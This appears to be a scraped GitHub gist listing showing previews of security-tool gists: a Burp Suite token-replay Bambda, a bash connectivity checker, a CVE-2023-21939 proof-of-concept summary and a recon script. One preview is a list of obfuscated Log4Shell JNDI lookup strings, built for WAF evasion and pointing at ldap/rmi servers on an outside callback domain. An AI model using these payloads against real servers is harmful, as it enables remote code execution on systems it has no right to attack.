Skip to content

Instantly share code, notes, and snippets.

View seqrity's full-sized avatar
👁️‍🗨️

Seqrity seqrity

👁️‍🗨️
13 followers · 11 following
View GitHub Profile
@irsdl
irsdl / burp-bambdas-repeater-extract-apply.bambda
Created September 16, 2025 12:11
A generic Burp Suite Bambdas Custom Action that finds the most recent Proxy history entry matching configurable filters (host/path/method/status/scope/highlight; plus request/response regex gates), extracts values (e.g., Cookie, aura.context, aura.token) via regex, and applies them to the current Repeater request—replacing the Cookie header and …
// ============================================================================
// Repeater Action: Pull tokens/values from Proxy History & Apply to THIS item
// ----------------------------------------------------------------------------
// WHAT IT DOES
// 1) Scans Proxy history (most recent first) for an entry that matches your filters.
// 2) Extracts values (Cookie header, form params, etc.) via regex extractors.
// 3) Applies the extracted values to the CURRENT Repeater request (requestResponse).
//
// HOW TO USE / EDIT (TL;DR)
// - Set filters in CONFIG (host/path/method/status/in-scope/highlight). Blank = ignored.
@hadifarnoud
hadifarnoud / internet_connectivity.sh
Last active May 30, 2024 18:29
#!/bin/bash
# URL to check for internet connectivity
URL="https://cp.cloudflare.com/generate_204"
INTERVAL=60 # Interval in seconds between checks
RETRIES=3 # Number of retries before concluding that the internet is down
RETRY_DELAY=1 # Delay in seconds between retries
CURL_TIMEOUT=1 # Curl timeout in seconds
# Function to check connectivity and measure latency
@win3zz
win3zz / CVE-2023-21939.md
Created August 27, 2023 12:33
CVE-2023-21939 - Code Exec - Proof of Concept

CVE-2023-21939 - Code Exec - Proof of Concept

Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie

@ZephrFish
ZephrFish / Log4j Payloads
Last active December 20, 2022 19:32
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
@aufzayed
aufzayed / haklist.sh
Created November 8, 2021 00:21
# the required tools
# subjs -> https://github.com/lc/subjs
# js-beautify -> https://github.com/beautify-web/js-beautify
# haklistgen -> https://github.com/hakluke/haklistgen
haklist() {
# declare TMPDIR variable
TMPDIR="/tmp/haklist"